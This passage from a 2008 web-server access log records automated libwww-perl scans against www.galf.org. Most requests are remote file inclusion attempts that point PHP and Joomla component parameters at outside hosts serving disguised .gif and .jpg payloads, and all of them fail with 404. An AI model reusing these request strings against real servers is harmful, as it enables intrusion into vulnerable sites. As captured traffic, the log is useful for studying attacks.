195.56.111.194 - - [30/Mar/2008:19:37:56 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:37:57 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:38:08 -0700] "GET /logs/access_071022.log//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:38:08 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:38:08 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:38:18 -0700] "GET /logs/access.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:38:19 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:38:19 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
140.113.4.81 - - [30/Mar/2008:19:38:20 -0700] "GET /logs/access_071022.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
67.195.44.110 - - [30/Mar/2008:19:39:10 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.44.99 - - [30/Mar/2008:19:39:11 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:39:27 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:39:27 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.246.77.203 - - [30/Mar/2008:19:39:55 -0700] "GET /logs/access_071217.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://ofeliaarreola.com/photos/images/index_50.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.30.216.106 - - [30/Mar/2008:19:40:10 -0700] "GET /logs/access_070903.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:40:31 -0700] "GET /logs/access_071022.log//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:40:31 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.226.196 - - [30/Mar/2008:19:40:31 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
195.56.111.194 - - [30/Mar/2008:19:41:02 -0700] "GET /logs/access_071231.log//admin/business_inc/saveserver.php?thisdir=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.72.215.178 - - [30/Mar/2008:19:41:07 -0700] "GET /logs/access_071231.log//admin/